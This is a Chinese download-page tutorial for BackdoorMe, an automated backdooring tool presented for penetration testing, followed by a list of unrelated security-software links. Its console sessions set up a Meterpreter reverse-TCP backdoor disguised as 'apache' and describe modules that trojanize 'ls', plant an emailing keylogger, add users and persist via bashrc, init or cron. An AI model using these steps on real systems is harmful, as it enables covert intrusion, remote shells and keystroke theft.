BackdoorMe是一款功能強(qiáng)大的自動化后門工具,用于滲透測試!很明顯,軟件是帶有攻擊性的,嚴(yán)禁用于非法用途。該工具目前使用了metasploit接口,以后會慢慢淡化接口,增強(qiáng)自身特色。需要的朋友下!
什么是后門程序
后門程序一般是指那些繞過安全性控制而獲取對程序或系統(tǒng)訪問權(quán)的程序方法。在軟件的開發(fā)階段,程序員常常會在軟件內(nèi)創(chuàng)建后門程序以便可以修改程序設(shè)計(jì)中的缺陷。但是,如果這些后門被其他人知道,或是在發(fā)布軟件之前沒有刪除后門程序,那么它就成了安全風(fēng)險(xiǎn),容易被黑客當(dāng)成漏洞進(jìn)行攻擊。
后門程序又稱特洛依木馬,其用途在于潛伏在電腦中,從事搜集信息或便于黑客進(jìn)入的動作。后門程序和電腦病毒最大的差別,在于后門程序不一定有自我復(fù)制的動作,也就是后門程序不一定會“感染”其它電腦。
BackdoorMe有哪些功能模塊
其內(nèi)置了Backdoors(后門)、Modules(模塊)和Auxiliaries(輔助模塊)
Bash
Bash2 (依賴更多)
Metasploit
Netcat
Netcat-traditional
Perl
Php (非WEB后門,但使用了WEB模塊)
Pupy
Python
Web (php –WEB后門)
BackdoorMe怎么用
在安裝backdoorme之前,請先確保您準(zhǔn)備好了所有的依賴包。
$ python dependencies.py
啟動backdoorme:
$ python master.py ___ __ __ __ ___ / _ )___ _____/ /_____/ /__ ___ ____/ |/ /__ / _ / _ `/ __/ '_/ _ / _ \/ _ \/ __/ /|_/ / -_) /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/ /_/\__/ Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands. Type "addtarget" to set a target, and "open" to open an SSH connection to that target. Using local IP of 10.1.0.1. >>
加入target:
>> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >>
Backdoor
請輸入“use”關(guān)鍵詞來使用后門:
>> use metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >>
從從這兒開始,你可以設(shè)置后門相關(guān)選項(xiàng),運(yùn)行“show options”或者“help”,來查看需要配置的參數(shù)。這里設(shè)置選項(xiàng),用“set”就行了。
(msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False format elf format to write the backdoor to True lhost 10.1.0.1 local IP to connect back to True encoder none encoder to use for the backdoor False lport 4444 local port to connect back on True payload linux/x86/meterpreter/reverse_tcp payload to deploy in backdoor True (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ...
Modules
每個(gè)后門在添加了額外的模塊后,會變得更加有效。要添加一個(gè)模塊,只需要使用“add”。
(msf) >> add poison + Poison module added
每個(gè)模塊都有額外的參數(shù)可以定制,如果運(yùn)行了“help”,你可以看到或者設(shè)置任何附加選項(xiàng)。
(msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False
現(xiàn)在能啟用的模塊包括:
Poison:
感染目標(biāo)計(jì)算機(jī)上的可執(zhí)行文件,它會編譯一個(gè)exe,把原有的程序變?yōu)楹箝T。
比如,如果這個(gè)模塊感染了“l(fā)s”,它會進(jìn)行編譯,然后把正常“l(fā)s”給變成后門“l(fā)s”,這樣一來用戶可以更頻繁地運(yùn)行“l(fā)s”后門。
Cron:
作用和做法同上。
Web:
啟動WEB服務(wù),放置存有后門的WEB頁面,訪問該網(wǎng)頁則監(jiān)聽開始。
Keylogger:
植入鍵盤記錄器,在配置時(shí)可以配入點(diǎn)自己郵件,每小時(shí)會收到結(jié)果。
User:
添加新用戶。
Startup:
可以將后門植入bashrc或者init文件。
Auxiliaries
為了更加隱蔽,某些用戶可能會希望在目標(biāo)機(jī) 器上使用特定的服務(wù)。應(yīng)用auxiliary模塊,使用“apply”即可。
>> apply user + User Auxiliary Module added.
Auxiliaries支持modules的使用,所有它們能更加隱蔽和頻繁的運(yùn)行。
>> (user) add startup + Startup Module added.
現(xiàn)有啟用的auxiliaries包括:
User
在目標(biāo)機(jī)器添加新用戶。
Targets
Backdoorme支持同時(shí)操作多個(gè)目標(biāo),使用數(shù)字序號切換即可。比如,使用“use metasploit 2”命令,可以在目標(biāo)“2”上使用msf。
- PC官方版
- 安卓官方手機(jī)版
- IOS官方手機(jī)版
SoftCnKiller流氓軟件檢測工具2.70 免費(fèi)版
Store-ind聯(lián)想軟件管家7.1.30.0428獨(dú)立提取版
工行企業(yè)網(wǎng)銀控件程序32&64位
工行網(wǎng)銀助手32位2.0 官方正版
工行網(wǎng)銀助手64位2.0 官方正版
360網(wǎng)絡(luò)小工具四合一整合端永久免費(fèi)版
SpyShelter Personal Free9.0 中文版
吾愛免殺工具箱綠色版1.0免費(fèi)版
異常進(jìn)程請求攔截工具(OSArmor)1.4 官方版
騰訊哈勃攝像頭安全檢測工具1.0.0.1 最新版
英特爾至尊調(diào)優(yōu)實(shí)用程序(英特爾 XTU)6.4.1.23 最新版
文件衛(wèi)士(電腦文件加密)19.18.00 永久免費(fèi)版
Abelssoft HackCheck官方版v2018 最新版
InSpectre(CPU漏洞檢測工具)1.0 綠色版
微軟CPU熔斷和幽靈漏洞補(bǔ)丁官方版
關(guān)閉特定程序軟件(CloseToQuit)1.0 綠色免費(fèi)版
IObit Malware Fighter Pro惡意軟件清除5.3.0.4078 中文特別版
desktoplayer專殺工具免費(fèi)版
IBM Rational AppScan電腦版8.0.491.0免費(fèi)版
強(qiáng)行修改啟動密碼PC版1.0.0電腦版
向上衛(wèi)士電腦版2.0專業(yè)版
360文檔衛(wèi)士1.0.0.1023官方最新版
隱身俠(將重要文件夾/文件進(jìn)行隱藏)6.0.0.2 官方版
路由優(yōu)化大師(拒絕別人蹭網(wǎng))4.5.32.275 官網(wǎng)正式版
共享文件夾加密超級大師PC版1.28 官網(wǎng)最新版
凈網(wǎng)衛(wèi)士電腦版2.1.4.0 PC版
360加固寶pc端(360加固助手)3.2.2.1 官方版 【64/32位】
秘銀保險(xiǎn)箱pc版1.5 官方最新版
主頁保安(主頁防篡改工具)1.0 綠色版
北極熊掃描器(網(wǎng)站安全檢測軟件)4.4 官網(wǎng)免費(fèi)版
360游戲保險(xiǎn)箱7.3.1.1011 最新版
易語言防誤報(bào)軟件1.0最新免費(fèi)版
MD5校驗(yàn)工具(MD5 Calculator)1.0.0.0 單文件
LEU9981隱私和保密自查系統(tǒng)V0.92 綠色最新版
瑞星升級保姆v2.07i綠色版
sql注入檢測工具(網(wǎng)站注入檢測工具)2.0 綠色
WFFC超級文件加密器6.0 漢化中文版【安全免
維融金網(wǎng)衛(wèi)士2.1.004 官網(wǎng)最新版【附安裝升
des算法測式工具(DES加密解密算法測試小軟件